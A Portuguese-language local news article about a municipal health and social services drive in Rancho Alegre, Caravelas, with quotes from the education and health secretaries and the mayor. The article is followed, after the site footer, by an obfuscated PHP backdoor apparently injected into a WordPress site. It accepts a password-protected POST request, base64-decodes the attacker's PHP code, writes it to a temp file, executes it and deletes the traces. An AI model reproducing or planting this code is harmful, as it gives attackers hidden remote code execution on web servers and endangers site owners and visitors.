• SEJA BEM-VINDO

Projeto de saúde leva mais de 1200 atendimentos para moradores de Rancho Alegre

Publicado em: 14/06/2022 Atualizado:: junho 14, 2022

 

Este número é mais uma ação do Projeto Nosso Povo, Nossa riqueza, que já passou por Barcelona e Ferraznópolis, no final de maio e, na última semana, na quinta e sexta-feira, dias 09 e 10, levou diversos serviços sociais e de saúde para os moradores de Rancho Alegre.

 

Apenas neste último distrito do município de Caravelas, foram realizados 1275 procedimentos, total que corresponde aos 200 atendimentos em programas sociais e serviços de cidadania e outros 1075 atendimentos de saúde com médico clínico geral, médico pediátrico, médico oftalmologista, nutricionista, psicólogo, dentista e enfermeiro.

 

Além dos atendimentos, gratuitamente, serão distribuídos, até 400 óculos para corrigir a visão de alunos, com diagnósticos mais graves. Ah, teve ainda pula-pula, algodão doce e muitas guloseimas, afinal, além de cuidar das crianças, tem de ser divertido, né?

 

 

 

 

Dona Taiana Conceição dos Santos aprovou a iniciativa. “Esse é um projeto muito bom, porque ajuda e facilita a vida dos pais e dos alunos, com o acesso à diversos serviços de saúde”, parabenizou.

 

O público alvo são os cerca de 4500 alunos matriculados na rede pública de ensino do município de Caravelas. O projeto, de acordo com a Secretária de Educação, Jocivânia Caetano, “tem por objetivo cuidar da visão destes alunos, muitos deles com históricos de problemas, sobretudo, após o período de pandemia, quando intensificaram a exposição dos olhos às telas de celulares, computadores, tablets e televisão”, explicou.

 

Secretária de Saúde de Caravelas, Marina Ramalho

 

“O projeto foi pensado para cuidar da visão e da saúde completa dos alunos, amparando os pais em muitos problemas que surgiram durante a pandemia”, afirmou a Secretária de Saúde de Caravelas, Marina Ramalho.

 

“Facilitar o acesso da população à diversos serviços, oferecidos através do Sistema Único de Saúde (SUS). Essa é a proposta do Projeto Nosso Povo, Nossa riqueza, em mais um grande investimento de recursos públicos para cuidar de quem mais precisa”, é o que disse o Prefeito de Caravelas, Silvio Ramalho.

 

Silvio Ramalho (Prefeito de Caravelas)


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}